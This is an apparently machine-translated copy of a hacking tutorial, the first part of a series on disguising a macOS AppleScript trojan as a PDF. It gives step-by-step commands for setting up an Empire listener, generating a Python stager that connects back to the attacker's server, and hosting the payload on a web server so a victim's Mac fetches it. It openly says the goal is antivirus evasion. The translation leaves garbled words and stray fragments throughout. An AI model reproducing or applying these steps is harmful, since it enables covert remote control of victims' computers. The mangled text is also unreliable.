قالب وردپرس درنا توس
Home / Tips and Tricks / Creating a Fake PDF Trojan with AppleScript, Part 1 (Creating the Stager) «Null Byte :: WonderHowTo

Creating a Fake PDF Trojan with AppleScript, Part 1 (Creating the Stager) «Null Byte :: WonderHowTo



While hackers have used numerous security vulnerabilities in Adobe's products to deliver user data about PDF files to Windows users, a malicious PDF file can also be harmful on a Mac using the default app for previewing. Think twice before double-clicking an open PDF on your MacBook – it could be a Trojan with a rootkit.

In this small, two-part series, I will describe in detail how a hacker can create a file to be an ordinary PDF file, but is a trojanized AppleScript that runs malicious code in the background on a MacBook or other Mac computer , In the GIF below, you can see both a real PDF and its fake PDF version with the malicious code.

Step 1: Familiarize yourself with Empire

To begin with, I'm using Empire (formerly PowerShell Empire), a post-exploitation framework known for its ability to provide hard-to-see PowerShell payloads To generate windows.

Empire relies heavily on the work of several other projects for its underlying features and features modules, and fortunately, it also supports Python payloads that can be used against MacOS and other Unix-like operating systems.

Readers unfamiliar with this tool are asked to read Empire's Beginner's Guide on zero bytes. It explains how to install Empire on Kali Linux or list all available options for staggers and listeners.

More information: Installing Empire on Kali Linux

The following steps can be performed using Kali Linux (for local network-based attacks) or a private Debian private server (for global attacks)

step 2: Creating an Empire HTTP Listener

To begin, change ( cd) to the Empire / directory and use the following command:

  ./ empire 

Listener Listening Ports on the server of the attacker on which Empire is running. These ports will later be used by the compromised MacBook to connect to the Empire Listener. A new listener is created to receive incoming connections from the MacBook.

To display available listeners, use the following command listeners .

  listeners 

On a new Empire installation, there will be no new listeners and "No currently active listeners" will be reported. To keep things simple, a standard HTTP listener can be enabled using the following command uselistener .

  uselistener http 

After the listener type has been set, info can be used. View the available options

  info 

There are a few options that (unfortunately) are beyond the scope of this Would blow up article. The standard options are good to follow, but readers are encouraged to play around with the options available and to configure the listeners to best suit their needs.

Next, make sure port and ] host is set to 80 or 0.0.0.0 as these options for the literal succession are decisive. You can set it with the following two commands. Using a 0.0.0.0 host instructs the Empire listener to be available on every interface. When Empire is used on a local network against a MacBook, the listener is available through the attacker's local IP address (for example, 192.168.0.4). Alternatively, if Empire is installed on a VPS, the listener is accessible to the VPS through the attacker's remote IP address.

  Set port 80
Set Host 0.0.0.0 

To start the Empire Listener, use the command execute . It should finally read: "Listener successfully started!"

  Execute 

The Listeners command can be used again to verify that the listener was started.

  listeners 

A list of all your active listeners is displayed. Record the listener Name here. By default, it is automatically set to "http". When testing different listeners while testing Empire, additional listeners can default to "http1" and "http2."

  (Empire: Listeners / http)> Listeners access

[*] Active listeners:

Name Module Host Delay / Jitter KillDate
---- ------ ---- ------------ --------
http http: //1x.xxx.xxx.x6: 80 5 / 0.0

(Empire: listeners)> _ 

That's it to create the listener for this attack. Next, the stager is generated.

Step 3: Create a Malicious MacOS Stager

Stacker, similar to the payloads, are used to connect back to the Empire Listener when they are opened by the victim user. 19659002] To view the available hares, type usestager space, and press tab on the keyboard

  usestager <*PRESS TAB*> 

There are nearly a dozen dedicated macOS homes ( referred to as "osx") available in Empire. In this article I show how to create an AppleScript stager.

  (Empire: Listeners)> usestager
Multi / Bash OSX / Macho Windows / Launcher_bat
Multi / Launcher osx / Macro window / launcher_lnk
multi / macro osx / pkg windows / launcher_sct
multi / pyinstaller osx / safari_launcher windows / launcher_vbs
osx / was osx / teensy windows / launcher_xml
osx / applescript windows / backdoorLnkMacro windows / macro
osx / application window / rabbit window / macroless_msword
osx / ducky windows / csharp_exe window / shellcode
osx / dylib windows / dll windows / teensy
Osx / glass window / Ducky
Osx / Launcher window / hta
(Empire: Listeners)> _ 

AppleScript is an Apple-developed scripting language. It allows users to directly control scriptable macOS applications as well as parts of macOS itself. Users can create scripts to automate repetitive tasks, combine features from multiple scriptable applications, add new functionality to Mac apps, and create complex workflows. AppleScript is currently included in all versions of macOS as part of a suite of system automation tools.

Do not miss: Use Siri to control iTunes, set your Mac to sleep and more from your iPhone

Generate a MacOS stager in the form of an AppleScript, use the following command:

  usestager osx / applescript 

Take a look at the available options with info .

  info 

Setting The listener option for the listener server created in the previous step is important. This tells the stager which server to connect to when running the AppleScript on the target MacBook.

  (Empire: Listeners)> usestager osx / applescript
(Empire: Hetzer / Osx / Applescript)> Info

Name: AppleScript

Description:
Generates AppleScript to run the launcher Empire stage0.

options:
Name Required value Description
---- -------- ----- -----------
Listener True http listener to create a level for.
OutFile False File to output AppleScript, otherwise displayed on the screen.
SafeChecks True True Switch. If you are looking for LittleSnitch or a sandbox, stop the staging process if the value is true. The default value is True.
Language True python Language of the stager to generate.
UserAgent False default User-agent string used for the staging request (defauult, none, or other).

_ 

Set the listener option with the following command. The Listener name should be used here (in this example we use http ).

  set listener http 

Then generate the AppleScript stager with the generate command

  generate 

Here I change the generated stager slightly differently than intended. First, understand that the code in the screenshot below is a Base64-encoded Python script. This is the script that will run on the MacBook and connect back to the attacker's server. Instead of embedding the Python script in AppleScript, it is hosted on the attacker's server and downloaded from the victim's computer when the fake PDF is opened.

An AppleScript will continue to be used to download and run the Python script in later steps, but it will not be in the actual AppleScript embedded. If you do this, you can bypass the virus detection because the actual Python script when scanning through VirusTotal does not exist in the fake PDF.

Step 4: Save the macOS Stager

Before the generated Python script can be saved, a new directory must be created. This directory is populated with several files that are important to the attack.

First, open a new terminal and create a directory named files with the command mkdir .

  mkdir files 

Then switch to the directory files /

  cd files / 

The highlighted section in the base64 encoded Python script (see previous step) should be copied and stored in a local file called [[] get saved. Script in the directory files /. This can be achieved with nano .

  nano script 

Nano can be saved and closed by pressing Ctrl + X then Y then Enter / Return ,

Step 5: Starting a Python3 Web Server

The Python3 server can be started with the following command .

  python3 -m http. Server 8080 & 

Python3 creates a Web server on port 8080 that makes files in the directory accessible to anyone. In this case, we want the script file containing the encoded Python script to be available to the victim macOS user. The & start the Python3 web server as a background process. Using a VPS is useful to make the server available after the SSH session is closed.

  `/ tokyoneon ~ / files
> python3 -m http.server 8080
Serving HTTP to 0.0.0.0 Port 8080 (http://0.0.0.0:8080/) ...
_ 

Untangling the macOS Stager

That was to set up the Empire Listener, generate the AppleScript stager, and host the Python script on a web server. In my next article, I'll show how to create an AppleScript to download and silently execute the Python script, and how to make the AppleScript appear as a legitimate PDF.

Cover image of freestocks.org / PEXELS; Screenshots of tokyoneon / zero byte

Source link